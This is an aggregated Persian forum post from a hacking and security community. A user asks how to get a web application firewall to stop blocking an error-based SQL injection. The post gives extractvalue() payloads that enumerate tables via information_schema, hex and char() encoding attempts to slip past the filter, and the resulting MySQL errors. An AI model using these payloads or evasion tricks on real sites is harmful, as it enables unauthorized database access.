Quantcast
Channel: انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک
Viewing all articles
Browse latest Browse all 19202

bypass xpath

April 25, 2013, 3:30 pm
$
0
0
با سلام

من وقتی می خوام xpath بزنم به مشکل Forbidden میخورم با ادرس زیر
کد:
id=1%20and%20extractvalue(rand(),(select+table_name+from+/**/information_schema.tables/**/+where+table_schema=database()+limit+0,1))--
مشکل فهمیدم از information_schema.tables قسمت است

را حل hex و را حل char رو هم رفتم ولی بعدش این دو خطا رو دارم

hex :

کد:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''696e666f726d6174696f6e5f736368656d612e7461626c6573' where table_schema=database' at line 1
خطا:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''696e666f726d6174696f6e5f736368656d612e7461626c65 73' where table_schema=database' at line 1


char:

کد:
id=1%20and%20extractvalue(rand(),(select+table_name+from+/**/char(105,110,102,111,114,109,97,116,105,111,110,95,115,99,104,101,109,97,46,116,97,98,108,101,115)/**/+where+table_schema=database()+limit+0,1))--
خطا:

کد:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from /**/char(105,110,102,111,114,109,97,116,105,111,110,95,115,99,104,101,109,9' at line 1

راحل دوستان؟؟؟
Search
Viewing all articles
Browse latest Browse all 19202

Trending Articles

شماره و آدرس ستاد وشهرستان های بنیاد شهید وامورایثارگران استان همدان

January 16, 2019, 9:50 pm

موزیک ویدیوی جدید از زوبین انوری به نام ستاره

December 5, 2012, 1:13 am

دانلود فیلم اتوبوس خط 152 – Der Todesbus 1998

October 11, 2017, 2:45 pm

متن و ترجمه Que Sera Sera یا Whatever will be, will be از Doris Day

March 2, 2016, 8:30 pm

دانلود نت گل ارکیده برای پیانو

October 14, 2017, 7:51 am

دانلود رمان دالان بهشت از نازی صفوی فرمت PDF|APK|EPUB

February 13, 2017, 10:24 pm

Can't make New submissions after upgrading ojs 3.1.1.0 to OJS 3.2.1.4

January 4, 2023, 7:51 pm

نقد فیلم اتفاق : The Happening

July 19, 2008, 9:41 am

روش كشيدن حصار يا مندل و مقدمات احضار

January 30, 2013, 10:51 pm

شایان شام‌بیاتی - ویکی‌پدیا

May 12, 2013, 3:16 pm

دانلود آهنگهای کردی زیبا از مرحوم آزاد خانقینی در رادیو دهلران

August 20, 2013, 5:57 am

دانلود آلبوم جدید رضا پیشرو به نام ریل

September 11, 2017, 2:11 am

نسخ مرثیه :: ای شاه مظلومان التوبه التوبه ::

March 30, 2013, 7:55 am

مسجد حجت ابن الحسن سهروردی

January 20, 2016, 9:38 pm

اکورد گیتار آهنگ من از اون اسمون ابی می خوام –سیمین غانم

January 27, 2014, 9:37 am

لیست کمیته امدادهای شهرستان تربت حیدریه

October 29, 2017, 9:25 pm

داستان سه معتاد به عشق از کتاب جمعیتو معتادیون فی العالم احمقین اثر شیخ شمس...

September 13, 2017, 4:33 am

برگزاری اولین اجلاس روسای دانشگاههای برتر روسیه و ایران

October 28, 2015, 6:09 am

آلبوم موسیقی فیلم سنگسار ثریا م. شاهکاری از جان دبنی + تمام کاورهای آلبوم

September 19, 2012, 9:44 pm

دانلود کلیپ ماهسون ماوی گوز mavi goz mahsun kirmizigul

December 2, 2012, 10:03 am
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>